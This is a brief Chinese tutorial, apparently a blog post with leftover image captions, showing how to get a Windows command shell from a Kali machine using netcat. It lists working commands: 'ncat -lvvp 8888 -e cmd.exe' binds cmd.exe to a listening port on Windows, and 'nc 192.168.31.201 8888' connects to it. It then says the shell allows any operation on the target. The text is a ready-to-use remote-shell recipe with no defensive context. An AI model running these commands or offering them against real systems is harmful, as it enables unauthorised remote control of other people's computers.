1.下载 ncat.exe 并上传到windows 

kali使用nc正向反弹windows shell_上传

 2.查看windows系统IP并运行ncat监听8888端口

 ncat -lvvp 8888 -e cmd.exe

kali使用nc正向反弹windows shell_服务器_02

 3.kali主机运行终端 并输入  nc 192.168.31.201 8888 回车后,将反弹windows系统shell到Kali终端

kali使用nc正向反弹windows shell_windows_03

现在可通过这个shell对windows系统进行任何操作